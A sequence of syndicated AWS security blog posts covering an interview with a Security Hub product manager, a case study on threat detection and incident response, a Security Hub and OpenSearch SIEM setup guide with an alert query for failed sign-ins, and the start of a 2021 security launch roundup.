In this post, we discussed how the solution uses Lambda, Step Functions and EventBridge to integrate IAM Access Analyzer with Macie discovery jobs. We reviewed the components of the application, deployed it by using CloudFormation, and reviewed the output a security team would use to take the appropriate actions. We also provided two ways that you can manage the costs associated with the solution.

After you deploy this project, you can modify it to meet your organization’s needs. For example, you can modify the tags to skip specific S3 buckets your organization has already classified to hold sensitive data. Customers who use multiple AWS accounts can designate a centralized Security Hub administrator account to receive the solution alerts from each member account. For more information on this option, see Designating a Security Hub administrator account.

If you have feedback about this post, please submit it in the Comments section below. If you have questions about this post, please start a new thread on the AWS Identity and Access Management forum.

Other resources

For more information on correlating security findings with AWS Security Hub and Amazon EventBridge, refer to this blog post.

Want more AWS Security news? Follow us on Twitter.

Nihar Das

Nihar Das

Nihar has over 20 years of experience in various business domains including financial services. As an AWS Senior Solutions Architect, he is passionate about solving challenges in the cloud and helps financial services customers to migrate to AWS and support the continued innovation.

Joe Dunn

Joe Dunn

Joe is an AWS Senior Solutions Architect in Financial Services with over 20 years of experience in infrastructure architecture and migration of business-critical loads to AWS. He helps financial services customers to innovate on the AWS Cloud by providing solutions using AWS products and services.

Armand Aquino

Armand Aquino

Armand is a solutions architect helping financial services organizations design their critical workloads on AWS. In his spare time, he enjoys exploring outdoors and learning Korean.

AWS Security Profile: Ely Kahn, Principal Product Manager for AWS Security Hub

Post Syndicated from Maddie Bacon original https://aws.amazon.com/blogs/security/aws-security-profile-ely-kahn-principal-product-manager-for-aws-security-hub/

In the AWS Security Profile series, I interview some of the humans who work in Amazon Web Services Security and help keep our customers safe and secure. This interview is with Ely Kahn, principal product manager for AWS Security Hub. Security Hub is a cloud security posture management service that performs security best practice checks, aggregates alerts, and facilitates automated remediation.

How long have you been at AWS and what do you do in your current role?

I’ve been with AWS just over 4 years. I came to AWS through the acquisition of a company I co-founded called Sqrrl, which then became Amazon Detective. Shortly after the acquisition, I moved from the Sqrrl/Detective team and helped launch AWS Security Hub. In my current role, I’m the head of product for Security Hub, which means I lead our product roadmap and our product strategy, and I translate customer requirements into technical specifications.

How did you get started in the world of security?

My career started inside the U.S. federal government, first inside the Department of Homeland Security and, specifically, inside the Transportation Security Administration (TSA). At the time, the TSA had uncovered a vulnerability concerning boarding passes and the terrorist no-fly list. I was tasked with figuring out how to close that vulnerability, and I came up with a new way to embed a digital signature inside the barcode to help ensure the authenticity of the boarding pass. After that, people thought I was a cybersecurity expert, and I began working on a lot of cybersecurity strategy and policy at the Department of Homeland Security and then at the White House.

How do you explain your job to your non-tech friends?

I actually explain it the same way to technical and non-technical friends. I head up a service called Security Hub, which is designed to help you do a couple of different things. It helps you understand your security posture on AWS—what sort of risks you face and the most urgent security issues that you need to address across your AWS accounts. It also gives you the tools to improve your security posture and help you fix as many of those security issues as possible. We do that through three primary functions. First, we aggregate all of your security alerts into a standardized data format that’s available in one place. Second, we do our own automated security checks. We look at all the resources you’ve enabled on AWS and help check that those resources are configured in accordance with best practices that we define, and in alignment with various regulatory frameworks. Third, we help you auto-remediate and auto-respond to as many of those issues as possible.

What are you currently working on that you’re excited about?

Our number one priority with Security Hub is to expand coverage of the automated security checks that we provide. We have almost 200 automated security checks today covering several dozen AWS services. Over the next few years, we plan to expand this to more AWS services, which will add a large number of additional security checks. This is important because customers don’t want to have to write these security checks themselves. They want the one-click capability to turn on the checks—or controls, as we call them in Security Hub—and they should be automatically on in all of your accounts. They should only run if you’re using resources that are actually in-scope for those checks, and they should produce a security score to help you quickly understand the security posture of different accounts and of your organization as a whole.

What would you say is the coolest feature of Security Hub?

The coolest feature is probably the one that gets the least attention. It’s what we call our AWS Security Finding Format (ASFF). The ASFF is really just a data standard—it consists of over 1,000 JSON fields and objects, and it’s how you normalize all of your different security alerts. We’ve integrated 75 different services and partner products. The real advantage of Security Hub is that we automatically take all of those different alerts from all of those different integration partners and normalize them into this standardized data format, so that when you’re searching the findings you have a common set of fields to search against if you’re trying to do correlations. For example, you can imagine a situation where Amazon GuardDuty detects unusual activity in an Amazon Simple Storage Service (Amazon S3) bucket, one of our Security Hub checks detects that the bucket is open, and Amazon Macie determines that the bucket contains sensitive information. It’s much easier to do correlations for situations like this when the alerts from those different tools are in the same format. Similarly, building auto-response, auto-remediation workflows is much easier when all of your alerts are in the same format. One of our biggest customers at AWS called the ASFF the gold standard for how to normalize security alerts, which is something we’re super proud of.

As you mentioned, Security Hub integrates with a lot of other AWS services, like GuardDuty and Macie. How do you work with other service teams?

We work across AWS in a couple of different ways. We build out these integrations with other AWS services to either send or receive findings from those services. So, we receive findings from services like GuardDuty and Macie, and we send our findings to other services like AWS Trusted Advisor to give them the same view of security that we see in Security Hub. In general, we try to make it as simple and as low impact as possible because every service team is extremely busy. Wherever possible, we do the integration work and don’t put the onus of effort on the other service team.

The other way we work with other service teams is to formally define the best practices for that service. We have a security engineering team on Security Hub, and we partner with AWS Professional Services and their security consultants. Together, we have been working through the list of the most popular AWS services using a standard taxonomy of control categories to define security controls and best practices for that service. We then work with product managers and engineers on those service teams to review the controls we’re proposing, get their feedback, and then finally code them up as AWS Config rules before deploying them in Security Hub. We have a very well-honed process now to partner with the service teams to integrate with and define the security controls for each service.

Where do you suggest customers start with Security Hub if they are newer in their cloud journey?

The first step with Security Hub is just to turn it on across all of your accounts and AWS Regions. When you do, you’re likely going to see a lot of alerts. Don’t get overwhelmed with the number of alerts you see. Focus initially on the critical and high-severity alerts and work them as campaigns. Identify the owners for all open critical and high-severity alerts and start tracking burndown on a weekly basis. Coordinate with the leadership in your organization so you can identify which teams are keeping up with the alerts and which ones aren’t.

What’s your favorite Leadership Principle and why?

My favorite is one that I initially discounted: frugality. When I first joined AWS, what came to mind was Jeff Bezos using doors as desks. Although that’s certainly a component of frugality, I’ve found that for me, this principle means that we need to be frugal with each other’s time. There are so many competing demands on everyone’s time, and it’s extremely important in a place like AWS to be mindful of that. Make sure you’ve done your due diligence on something before you broadly ask the question or escalate.

What’s the thing you’re most proud of in your career?

There are two things. First is the acquisition of Sqrrl by AWS. I couldn’t have picked a better landing spot for Sqrrl and the team. I feel really lucky that I joined AWS through this acquisition. I’ve really learned a lot here in a short amount of time.

The other thing I’m especially proud of is to have been selected to do a stint through the White House National Security Council staff as the Department of Homeland Security representative to the Council. I sat in the cybersecurity directorate from 2009–2010 as part of that detail to the White House and got a chance to work in the West Wing and attend meetings in the Situation Room, which was just such a special experience.

If you had to pick an industry outside of security, what would you want to do?

This is pretty similar to security, but I got very close to going into the military. Out of high school, I was being recruited for lacrosse at the U.S. Air Force Academy. I had convinced myself that I wanted to go fly jets. I have the utmost respect for our military community, and I certainly could’ve seen myself taking that path.

 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Author

Maddie Bacon

Maddie (she/her) is a technical writer for AWS Security with a passion for creating meaningful content. She previously worked as a security reporter and editor at TechTarget and has a BA in Mathematics. In her spare time, she enjoys reading, traveling, and all things Harry Potter.

Ely Kahn

Ely Kahn

Ely Kahn is the Principal Product Manager for AWS Security Hub. Before his time at AWS, Ely was a co-founder for Sqrrl, a security analytics startup that AWS acquired and is now Amazon Detective. Earlier, Ely served in a variety of positions in the federal government, including Director of Cybersecurity at the National Security Council in the White House.

Journey to Adopt Cloud-Native Architecture Series #5 – Enhancing Threat Detection, Data Protection, and Incident Response

Post Syndicated from Anuj Gupta original https://aws.amazon.com/blogs/architecture/journey-to-adopt-cloud-native-architecture-series-5-enhancing-threat-detection-data-protection-and-incident-response/

In Part 4 of this series, Governing Security at Scale and IAM Baselining, we discussed building a multi-account strategy and improving access management and least privilege to prevent unwanted access and to enforce security controls.

As a refresher from previous posts in this series, our example e-commerce company’s “Shoppers” application runs in the cloud. The company experienced hypergrowth, which posed a number of platform and technology challenges, including enforcing security and governance controls to mitigate security risks.

With the pace of new infrastructure and software deployments, we had to ensure we maintain strong security. This post, Part 5, shows how we detect security misconfigurations, indicators of compromise, and other anomalous activity. We also show how we developed and iterated on our incident response processes.

Threat detection and data protection

With our newly acquired customer base from hypergrowth, we had to make sure we maintained customer trust. We also needed to detect and respond to security events quickly to reduce the scope and impact of any unauthorized activity. We were concerned about vulnerabilities on our public-facing web servers, accidental sensitive data exposure, and other security misconfigurations.

Prior to hypergrowth, application teams scanned for vulnerabilities and maintained the security of their applications. After hypergrowth, we established dedicated security team and identified tools to simplify the management of our cloud security posture. This allowed us to easily identify and prioritize security risks.

Use AWS security services to detect threats and misconfigurations

We use the following AWS security services to simplify the management of cloud security risks and reduce the burden of third-party integrations. This also minimizes the amount of engineering work required by our security team.

Detect threats with Amazon GuardDuty

We use Amazon GuardDuty to keep up with the newest threat actor tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs).

GuardDuty saves us time and reduces complexity, because we don’t have to continuously engineer detections for new TTPs and IOCs for static events and machine-learning-based detections. This allows our security analysts to focus on building runbooks and quickly responding to security findings.

Discover sensitive data with Amazon Macie for Amazon S3

To host our external website, we use a few public Amazon Simple Storage Service (Amazon S3) buckets with static assets. We don’t want developers to accidentally put sensitive data in these buckets, and we wanted to understand which S3 buckets contain sensitive information, such as financial or personally identifiable information (PII).

We explored building a custom scanner to search for sensitive data, but maintaining the search patterns was too complex. It was also costly to continuously re-scan files each month. Therefore, we use Amazon Macie to continuously scan our S3 buckets for sensitive data. After Macie makes its initial scan, it will only scan new or updated objects in those S3 buckets, which reduces our costs significantly. We added filter rules to exclude files of larger size and S3 prefixes to scan required objects and provided a sampling rate to further cost optimize scanning large S3 buckets (in our case, S3 buckets greater than 1 TB).

Scan for vulnerabilities with Amazon Inspector

Because we use a wide variety of operating systems and software, we must scan our Amazon Elastic Compute Cloud (Amazon EC2) instances for known software vulnerabilities, such as Log4J.

We use Amazon Inspector to run continuous vulnerability scans on our EC2 instances and Amazon Elastic Container Registry (Amazon ECR) container images. With Amazon Inspector, we can continuously detect if our developers are deploying and releasing vulnerable software on our EC2 instances and ECR images without setting up a third-party vulnerability scanner and installing additional endpoint agents.

Aggregate security findings with AWS Security Hub

We don’t want our security analysts to arbitrarily act on one security finding over another. This is time-consuming and does not properly prioritize the highest risks to address. We also need to track ownership, view progress of various findings, and build consistent responses for common security findings.

With AWS Security Hub, our analysts can seamlessly prioritize findings from GuardDuty, Macie, Amazon Inspector, and many other AWS services. Our analysts also use Security Hub’s built-in security checks and insights to identify AWS resources and accounts that have a high number of findings and act on them.

Setting up the threat detection services

This is how we set up these services:

Our security analysts use Security Hub-generated Jira tickets to view, prioritize, and respond to all security findings and misconfigurations across our AWS environment.

Through this configuration, our analysts no longer need to pivot between various AWS accounts, security tool consoles, and Regions, which makes the day-to-day management and operations much easier. Figure 1 depicts the data flow to Security Hub.

Aggregation of security services in security tooling account

Figure 1. Aggregation of security services in security tooling account

Delegated administrator setup

Figure 2. Delegated administrator setup

Incident response

Before hypergrowth, there was no formal way to respond to security incidents. To prevent future security issues, we built incident response plans and processes to quickly address potential security incidents and minimize the impact and exposure. Following the AWS Security Incident Response Guide and NIST framework, we adopted the following best practices.

Playbooks and runbooks for repeatability

We developed incident response playbooks and runbooks for repeatable responses for security events that include:

  • Playbooks for more strategic scenarios and responses based on some of the sample playbooks found here.
  • Runbooks that provide step-by-step guidance for our security analysts to follow in case an event occurs. We used Amazon SageMaker notebooks and AWS Systems Manager Incident Manager runbooks to develop repeatable responses for pre-identified incidents, such as suspected command and control activity on an EC2 instance.

Automation for quicker response time

After developing our repeatable processes, we identified areas where we could accelerate responses to security threats by automating the response. We used the AWS Security Hub Automated Response and Remediation solution as a starting point.

By using this solution, we didn’t need to build our own automated response and remediation workflow. The code is also easy to read, repeat, and centrally deploy through AWS CloudFormation StackSets. We used some of the built-in remediations like disabling active keys that have not been rotated for more than 90 days, making all Amazon Elastic Block Store (Amazon EBS) snapshots private, and many more. With automatic remediation, our analysts can respond quicker and in a more holistic and repeatable way.

Simulations to improve incident response capabilities

We implemented quarterly incident response simulations. These simulations test how well prepared our people, processes, and technologies are for an incident. We included some cloud-specific simulations like an S3 bucket exposure and an externally shared Amazon Relational Database Service (Amazon RDS) snapshot to ensure our security staff are prepared for an incident in the cloud. We use the results of the simulations to iterate on our incident response processes.

Conclusion

In this blog post, we discussed how to prepare for, detect, and respond to security events in an AWS environment. We identified security services to detect security events, vulnerabilities, and misconfigurations. We then discussed how to develop incident response processes through building playbooks and runbooks, performing simulations, and automation. With these new capabilities, we can detect and respond to a security incident throughout hypergrowth.

Looking for more architecture content? AWS Architecture Center provides reference architecture diagrams, vetted architecture solutions, Well-Architected best practices, patterns, icons, and more!

Other blog posts in this series

How to use AWS Security Hub and Amazon OpenSearch Service for SIEM

Post Syndicated from Ely Kahn original https://aws.amazon.com/blogs/security/how-to-use-aws-security-hub-and-amazon-opensearch-service-for-siem/

AWS Security Hub provides you with a consolidated view of your security posture in Amazon Web Services (AWS) and helps you check your environment against security standards and current AWS security recommendations. Although Security Hub has some similarities to security information and event management (SIEM) tools, it is not designed as standalone a SIEM replacement. For example, Security Hub only ingests AWS-related security findings and does not directly ingest higher volume event logs, such as AWS CloudTrail logs. If you have use cases to consolidate AWS findings with other types of findings from on-premises or other non-AWS workloads, or if you need to ingest higher volume event logs, we recommend that you use Security Hub in conjunction with a SIEM tool.

There are also other benefits to using Security Hub and a SIEM tool together. These include being able to store findings for longer periods of time than Security Hub, aggregating findings across multiple administrator accounts, and further correlating Security Hub findings with each other and other log sources. In this blog post, we will show you how you can use Amazon OpenSearch Service (successor to Amazon Elasticsearch Service) as a SIEM and integrate Security Hub with it to accomplish these three use cases. Amazon OpenSearch Service is a fully managed service that makes it easier to deploy, manage, and scale Elasticsearch and Kibana. OpenSearch Service is a distributed, RESTful search and analytics engine that is capable of addressing a growing number of use cases. You can expand OpenSearch Service with AWS services like Kinesis or Kinesis Data Firehose, by integrating with other AWS services, or by using traditional agents like Beats and Logstash for log ingestion, and Kibana for data visualization. Although the OpenSearch Service also is not a SIEM out-of-the-box tool, with some customization, you can use it for SIEM tool use cases.

Security Hub plus SIEM use cases

By enabling Security Hub within your AWS Organizations account structure, you immediately start receiving the benefits of viewing all of your security findings from across various AWS and partner services on a single screen. Some organizations want to go a step further and use Security Hub in conjunction with a SIEM tool for the following reasons:

  • Correlate Security Hub findings with each other and other log sources – This is the most popular reason customers choose to implement this solution. If you have various log sources outside of Security Hub findings (such as application logs, database logs, partner logs, and security tooling logs), then it makes sense to consolidate these log sources into a single SIEM solution. Then you can view both your Security Hub findings and miscellaneous logs in the same place and create alerts based on interesting correlations.
  • Store findings for longer than 90 days after the last update date – Some organizations want or need to store Security Hub findings for longer than 90 days after the last update date. They may want to do this for historical investigation, or for audit and compliance needs. Either way, this solution offers you the ability to store Security Hub findings in a private Amazon Simple Storage Service (Amazon S3) bucket, which is then consumed by Amazon OpenSearch Service.
  • Aggregate findings across multiple administrator accounts – Security Hub has a feature customers can use to designate an administrator account if they have enabled Security Hub in multiple accounts. A Security Hub administrator account can view data from and manage configuration for its member accounts. This allows customers to view and manage all their findings from multiple member accounts in one place. Sometimes customers have multiple Security Hub administrator accounts, because they have multiple organizations in AWS Organizations. In this situation, you can use this solution to consolidate all of the Security Hub administrator accounts into a single OpenSearch Service with Kibana SIEM implementation to have a single view across your environments. This related blog post walks through this use case in more detail, and shows how to centralize Security Hub findings across multiple AWS Regions and administrators. However, this blog post takes this approach further by introducing OpenSearch Service with Kibana to the use case, for a full SIEM experience.

Solution architecture

Figure 1: SIEM implementation on Amazon OpenSearch Service

Figure 1: SIEM implementation on Amazon OpenSearch Service

The solution represented in Figure 1 shows the flexibility of integrations that are possible when you create a SIEM by using Amazon OpenSearch Service. The solution allows you to aggregate findings across multiple accounts, store findings in an S3 bucket indefinitely, and correlate multiple AWS and non-AWS services in one place for visualization. This post focuses on Security Hub’s integration with the solution, but the following AWS services are also able to integrate:

Each of these services has its own dedicated dashboard within the OpenSearch SIEM solution. This makes it possible for customers to view findings and data that are relevant to each service that the SIEM tool is ingesting. OpenSearch Service also allows the customer to create aggregated dashboards, consolidating multiple services within a single dashboard, if needed.

Prerequisites

We recommend that you enable Security Hub and AWS Config across all of your accounts and Regions. For more information about how to do this, see the documentation for Security Hub and AWS Config. We also recommend that you use Security Hub and AWS Config integration with AWS Organizations to simplify the setup and automatically enable these services in all current and future accounts in your organization.

Launch the solution

In order to launch this solution within your environment, you can either launch the solution by using an AWS CloudFormation template, or by following the steps presented later in this post to customize the deployment to support integrations with non-AWS services, multi-Organization deployments, or launch within your existing OpenSearch Service environment.

To launch the solution, follow the instructions for SIEM on Amazon OpenSearch Service on GitHub.

Use the solution

Before you start using the solution, we’ll show you how this solution appears in the Security Hub dashboard, as shown in Figure 2. Navigate here by following Step 3 from the GitHub README.

Figure 2: Pre-built dashboards within solution

Figure 2: Pre-built dashboards within solution

The Security Hub dashboard highlights all major components of the service within an OpenSearch Service dashboard environment. This includes supporting all of the service integrations that are available within Security Hub (such as GuardDuty, AWS Identity and Access Management (IAM) Access Analyzer, Amazon Inspector, Amazon Macie, and AWS Systems Manager Patch Manager). The dashboard displays both findings and security standards, and you can filter by AWS account, finding type, security standard, or service integration. Figure 3 shows an overview of the visual dashboard experience when you deploy the solution.

Figure 3: Dashboard preview

Figure 3: Dashboard preview

Use case 1: Correlate Security Hub findings with each other and other log sources and create alerts

This solution uses OpenSearch Service and Kibana to allow you to search through both Security Hub findings and logs from any other AWS and non-AWS systems. You can then create alerts within Kibana based on interesting correlations between Security Hub and any other logged events. Although Security Hub supports ingesting a vast number of integrations and findings, it cannot create correlation rules like a SIEM tool can. However, you can create such rules using SIEM on OpenSearch Service. It’s important to take a closer look when multiple AWS security services generate findings for a single resource, because this potentially indicates elevated risk or multiple risk vectors. Depending on your environment, the initial number of findings in Security Hub may be high, so you may need to prioritize which findings require immediate action. Security Hub natively gives you the ability to filter findings by resource, account, severity, and many other details.

As part of the findings, you can send notifications through alerts that are generated by SIEM on OpenSearch Service in several ways: Amazon Simple Notification Service (Amazon SNS) by consuming messages in an appropriate tool or configuring recipient email addresses, Amazon Chime, Slack (using AWS Chatbot) or custom webhook to your organization’s ticketing system. You can then respond to these new security incident-oriented findings through ticketing, chat, or incident management systems.

Solution overview for use case 1

Figure 4: Solution overview diagram

Figure 4: Solution overview diagram

Figure 4 gives an overview of the solution for use case 1. This solution requires that you have Security Hub and GuardDuty enabled in your AWS account. Logs from AWS services, including Security Hub, are ingested into an S3 bucket, then are automatically extracted, transformed, and loaded (ETL) and populated into the SIEM system that is running on OpenSearch Service using AWS Lambda. After capturing the logs, you will be able to visualize them on the dashboard and analyze correlations of multiple logs. Within the SIEM on OpenSearch Service solution, you will create a rule to detect failures, such as CloudTrail authentication failures in logs. Then, you will configure the solution to publish alerts to Amazon SNS and send emails when logs match rules.

Implement the solution for use case 1

You will now set up this workflow to alert you by email when logs in OpenSearch match certain rules that you create.

Step 1: Create and visualize findings in OpenSearch Dashboards

Security Hub and other AWS services export findings to Amazon S3 in a centralized log bucket. You can ingest logs from CloudTrail, VPC Flow Logs, and GuardDuty, which are often used in AWS security analytics. In this step, you import simulated security incident data in OpenSearch Dashboards, and use the dashboard to visualize the data in the logs.

To navigate OpenSearch Dashboards

  1. Generate pseudo-security incidents. You can simulate the results by generating sample findings in GuardDuty.
  2. In OpenSearch Dashboards, go to the Discover screen. The Discover screen is divided into three major sections: Search bar, index/display field list, and time-series display, as shown in Figure 5.
    Figure 5: OpenSearch Dashboards

    Figure 5: OpenSearch Dashboards

  3. In OpenSearch Dashboards, select log-aws-securityhub-* or log-aws-vpcflowlogs-* or log-aws-cloudtrail-* or any other index patterns and add event.module to the display field. event.module is a field that indicates where the log originates from. If you are collecting other threat information, such as Security Hub, @log-type is Security Hub, and event.module indicates where the log originated from (either Amazon Inspector or Amazon Macie for example). After you have added event.module, filter the desired Security Hub integrated service (for example, Amazon Inspector) to display. When testing the environment covered in this blog post outside a production context, you can use Kinesis Data Generator to generate sample user traffic. Other tools are also available.
  4. Select the following on the dashboard to see the visualized information:
    • CloudTrail Summary
    • VpcFlowLogs Summary
    • GuardDuty Summary
    • All – Threat Hunting

Step 2: Configure alerts to match log criteria

Next, you will configure alerts to match log criteria. First you need to set the destination for alerts, and then set what to monitor.

To configure alerts

  1. In OpenSearch Dashboards, in the left menu, choose Alerting.
  2. To add the details of SNS, on the Destinations tab, choose Add destinations, and enter the following parameters:
    • Name: aes-siem-alert-destination
    • Type: Amazon SNS
    • SNS Alert: arn:aws:sns:<AWS-REGION>:<111111111111>:aes-siem-alert
      • Replace <111111111111> with your AWS account ID and correct the Region name
      • Replace <AWS-REGION> with the Region you are using, for example, eu-west-1
    • IAM Role ARN: arn:aws:iam::<111111111111>:role/aes-siem-sns-role
      • Replace &<111111111111> with your AWS account ID
  3. Choose Create to complete setting the alert destination.
    Figure 6: Edit alert destination

    Figure 6: Edit alert destination

  4. In OpenSearch Dashboards, in the left menu, select Alerting. You will now set what to monitor. Here you monitor a CloudTrail trail authentication failure. There are two normalized log times: @timestamp and event.ingested. The difference is between the log occurrence time (@timestamp) and the SIEM reception time (event.ingested). Use event.ingested for logs with a large time lag from occurrence to reception. You can specify flexible conditions by selecting Define using extraction query for the filter definition.
  5. On the Monitors tab, choose Create monitor.
  6. Enter the following parameters. If there is no description, use the default value.
    • Name: Authentication failed
    • Method of definition: Define using extraction query
    • Indices: log-aws-cloudtrail-* (manual input, not pull-down)
    • Define extraction query: Enter the following query.
      {
      	"query": {
      		"bool": {
      			"filter": [
      			{"term": {"eventSource": "signin.amazonaws.com"}},
      			{"term": {"event.outcome": "failure"}},
      			{"range": {
      				"event.ingested": {
      				"from": "{{period_end}}||-20m",
      				"to": "{{period_end}}"}}
      				}
      			]
      		}
      	}
      }
      

  7. Enter the following remaining parameters of the monitor:
    • Frequency: By interval
    • Monitor schedule: Every 3 minutes
  8. Choose Create to create the monitor.

Step 3: Set up trigger to send email via Amazon SNS

Now you will set the alert firing condition, known as the trigger. This is the setting for alerting when the monitored conditions (Monitors) are met. By default, the alert will be triggered if the number of hits is greater than 0. In this step , you will not change it, only give it a name.

To set up the trigger

  1. Select Create trigger and for Trigger name, enter Authentication failed trigger.
  2. Scroll down to Configure actions.
    Figure 7: Create trigger

    Figure 7: Create trigger

  3. Set what the trigger should do (action). In this case, you want to publish to SNS. Set the following parameters for the body of the email
    • Action name: Authentication failed action
    • Destination: Choose aes-siem-alert-destination – (Amazon SNS)
    • Message subject: (SIEM) Auth failure alert
    • Action throttling: Select Enable action throttling, and set throttle action to only trigger every 10 minutes.
    • Message: Copy and paste the following message into the text box. After pasting, choose Send test message at the bottom right of the screen to confirm that you can receive the test email.

      Monitor ctx.monitor.name just entered alert status. Please investigate the issue.

      Trigger: ctx.trigger.name

      Severity: ctx.trigger.severity

      @timestamp: ctx.results.0.hits.hits.0._source.@timestamp

      event.action: ctx.results.0.hits.hits.0._source.event.action

      error.message: ctx.results.0.hits.hits.0._source.error.message

      count: ctx.results.0.hits.total.value

      source.ip: ctx.results.0.hits.hits.0._source.source.ip

      source.geo.country_name: ctx.results.0.hits.hits.0._source.source.geo.country_name

    Figure 8: Configure actions

    Figure 8: Configure actions

  4. You will receive an alert email in a few minutes. You can check the occurrence status, including the history, by the following method:
    1. In OpenSearch Dashboards, on the left menu, choose Alerting.
    2. On the Monitors tab, choose Authentication failed.
    3. You can check the status of the alert in the History pane.
    Figure 9: Email alert

    Figure 9: Email alert

Use case 1 shows you how to correlate various Security Hub findings through this OpenSearch Service SIEM solution. However, you can take the solution a step further and build more complex correlation checks by following the procedure in the blog post Correlate security findings with AWS Security Hub and Amazon EventBridge. This information can then be ingested into this OpenSearch Service SIEM solution for viewing on a single screen.

Use case 2: Store findings for longer than 90 days after last update date

Security Hub has a maximum storage time of 90 days for events, but your organization might require data storage beyond that period, with flexibility to specify a custom retention period to meet your needs. The SIEM on Amazon OpenSearch Service solution creates a centralized S3 bucket where findings from Security Hub and various other services are collected and stored, and this bucket can be configured to store data as long as you require. The S3 bucket can persist data indefinitely, or you can create an S3 object lifecycle policy to set a custom retention timeframe. Lifecycle policies allow you to either transition objects between S3 storage classes or delete objects after a specified period. Alternatively, you can use S3 Intelligent-Tiering to allow the Amazon S3 service to move data between tiers, based on user access patterns.

Either lifecycle policies or S3 Intelligent-Tiering will allow you to optimize costs for data that is stored in S3, to keep data for archive or backup purposes when it is no longer available in Security Hub or OpenSearch Service. Within the solution, this centralized bucket is called aes-siem-xxxxxxxx-log and is configured to store data for OpenSearch Service to consume indefinitely. The Amazon S3 User Guide has instructions for configuring an S3 lifecycle policy that is explicitly defined by the user on the centralized bucket. Or you can follow the instructions for configuring intelligent tiering to allow the S3 service to manage which tier data is stored in automatically. After data is archived, you can use Amazon Athena to query the S3 bucket for historical information that has been removed from OpenSearch Service, because this S3 bucket acts as a centralized security event repository.

Use case 3: Aggregate findings across multiple administrator accounts

There are cases where you might have multiple Security Hub administrator accounts within one or multiple organizations. For these use cases, you can consolidate findings across these multiple Security Hub administrator accounts into a single S3 bucket for centralized storage, archive, backup, and querying. This gives you the ability to create a single SIEM on OpenSearch Service to minimize the number of monitoring tools you need. In order to do this, you can use S3 replication to automatically copy findings to a centralized S3 bucket. You can follow this detailed walkthrough on how to set up the correct bucket permissions in order to allow replication between the accounts. You can also follow this related blog post to configure cross-Region Security Hub findings that are centralized in a single S3 bucket, if cross-Region replication is appropriate for your security needs. With cross-account S3 replication set up for Security Hub archived event data, you can import data from the centralized S3 bucket into OpenSearch Service by using the Lambda function within the solution in this blog post. This Lambda function automatically normalizes and enriches the log data and imports it into OpenSearch Service, so that users only need to configure data storage in the S3 bucket, and the Lambda function will automatically import the data.

Conclusion

In this blog post, we showed how you can use Security Hub with a SIEM to store findings for longer than 90 days, aggregate findings across multiple administrator accounts, and correlate Security Hub findings with each other and other log sources. We used the solution to walk through building the SIEM and explained how Security Hub could be used within that solution to add greater flexibility. This post describes one solution to create your own SIEM using OpenSearch Service; however, we also recommend that you read the blog post Visualize AWS Security Hub Findings using Analytics and Business Intelligence Tools, in order to see a different method of consolidating and visualizing insights from Security Hub.

To learn more, you can also try out this solution through the new SIEM on AWS OpenSearch Service workshop.

If you have feedback about this blog post, submit comments in the Comments section below. If you have questions about this blog post, please start a new thread on the Security Hub forum or contact AWS Support.

 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Ely Kahn

Ely Kahn

Ely Kahn is the Principal Product Manager for AWS Security Hub. Before his time at AWS, Ely was a co-founder for Sqrrl, a security analytics startup that AWS acquired and is now Amazon Detective. Earlier, Ely served in a variety of positions in the federal government, including Director of Cybersecurity at the National Security Council in the White House.

Anthony Pasquariello

Anthony Pasquariello

Anthony Pasquariello is a Senior Solutions Architect at AWS based in New York City. He specializes in modernization and security for our advanced enterprise customers. Anthony enjoys writing and speaking about all things cloud. He’s pursuing an MBA, and received his MS and BS in Electrical & Computer Engineering.

Aashmeet Kalra

Aashmeet Kalra

Aashmeet Kalra is a Principal Solutions Architect working in the Global and Strategic team at AWS in San Francisco. Aashmeet has over 17 years of experience designing and developing innovative solutions for customers globally. She specializes in advanced analytics, machine learning and builder/developer experience.

Grant Joslyn

Grant Joslyn

Grant Joslyn is a solutions architect for the US state and local government public sector team at Amazon Web Services (AWS). He specializes in end user compute and cloud automation. He provides technical and architectural guidance to customers building secure solutions on AWS. He is a subject matter expert and thought leader for strategic initiatives that help customers embrace DevOps practices.

Akihiro Nakajima

Akihiro Nakajima

Akihiro Nakajima is a Senior Solutions Architect, Security Specialist at Amazon Web Services Japan. He has more than 20 years of experience in security, specifically focused on incident analysis and response, threat hunting, and digital forensics. He leads development of open-source software, “SIEM on Amazon OpenSearch Service”.

Top 2021 AWS Security service launches security professionals should review – Part 1

Post Syndicated from Ryan Holland original https://aws.amazon.com/blogs/security/top-2021-aws-security-service-launches-part-1/

Given the speed of Amazon Web Services (AWS) innovation, it can sometimes be challenging to keep up with AWS Security service and feature launches. To help you stay current, here’s an overview of some of the most important 2021 AWS Security launches that security professionals should be aware of. This is the first of two related posts; Part 2 will highlight some of the important 2021 launches that security professionals should be aware of across all AWS services.

Amazon GuardDuty

In 2021, the threat detection service Amazon GuardDuty expanded the internal AWS security intelligence it consumes to use more of the intel that AWS internal threat detection teams collect, including additional nation-state threat intelligence. Sharing more of the important intel that internal AWS teams collect lets you quickly improve your protection. GuardDuty also launched domain reputation modeling. These machine learning models take all the domain requests from across all of AWS, and feed them into a model that allows AWS to categorize previously unseen domains as highly likely to be malicious or benign based on their behavioral characteristics. In practice, AWS is seeing that these models often deliver high-fidelity threat detections, identifying malicious domains 7–14 days before they are identified and available on commercial threat feeds.

AWS also launched second generation anomaly detection for GuardDuty. Shortly after the original GuardDuty launch in 2017, AWS added additional anomaly detection for user behavior analytics and monitoring for unusual activity of AWS Identity and Access Management (IAM) users. After receiving customer feedback that the original feature was a little too noisy, and that it was difficult to understand why some findings were generated, the GuardDuty analytics team rebuilt this functionality on an entirely new machine learning model, considerably reducing the number of detections and generating a more accurate positive-detection rate. The new model also added additional context that security professionals (such as analysts) can use to understand why the model shows findings as suspicious or unusual.

Since its introduction, GuardDuty has detected when AWS EC2 Role credentials are used to call AWS APIs from IP addresses outside of AWS. Beginning in early 2022, GuardDuty now supports detection when credentials are used from other AWS accounts, inside the AWS network. This is a complex problem for customers to solve on their own, which is why the GuardDuty team added this enhancement. The solution considers that there are legitimate reasons why a source IP address that is communicating with AWS services APIs might be different than the Amazon Elastic Compute Cloud (Amazon EC2) instance IP address, or a NAT gateway associated with the instance’s VPC. The enhancement also considers complex network topologies that route traffic to one or multiple VPCs—for example, AWS Transit Gateway or AWS Direct Connect.

